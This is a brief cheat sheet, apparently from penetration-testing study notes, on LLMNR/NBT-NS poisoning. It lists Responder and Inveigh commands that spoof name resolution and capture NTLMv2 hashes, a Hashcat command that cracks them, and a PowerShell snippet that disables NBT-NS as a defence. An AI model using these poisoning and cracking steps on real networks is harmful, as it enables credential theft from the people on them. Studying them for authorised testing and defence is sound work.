LLMNR/NTB-NS Poisoning
Step 1: Display Responder Help Menu
responder -hDisplays usage instructions and various available options in Responder from a Linux-based host.
Step 2: Crack NTLMv2 Hashes with Hashcat
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txtUses Hashcat to crack NTLMv2 (-m 5600) hashes captured by Responder and saved in a file (forend_ntlmv2). Cracking is performed using the specified wordlist.
Step 3: Import Inveigh PowerShell Module
Import-Module .\Inveigh.ps1Uses the Import-Module PowerShell cmdlet to import the Windows-based tool Inveigh.ps1.
Step 4: List Invoke-Inveigh Parameters
(Get-Command Invoke-Inveigh).ParametersOutputs available options and functionalities for Invoke-Inveigh. Performed from a Windows-based host.
Step 5: Start Inveigh with LLMNR & NBNS Spoofing
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput YStarts Inveigh on a Windows-based host with LLMNR & NBNS spoofing enabled. Results are outputted to a file.
Step 6: Start Inveigh C# Implementation
.\Inveigh.exeStarts the C# implementation of Inveigh from a Windows-based host.
Step 7: Disable NBT-NS on Windows
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey | foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose }PowerShell script used to disable NBT-NS on a Windows host.
Last updated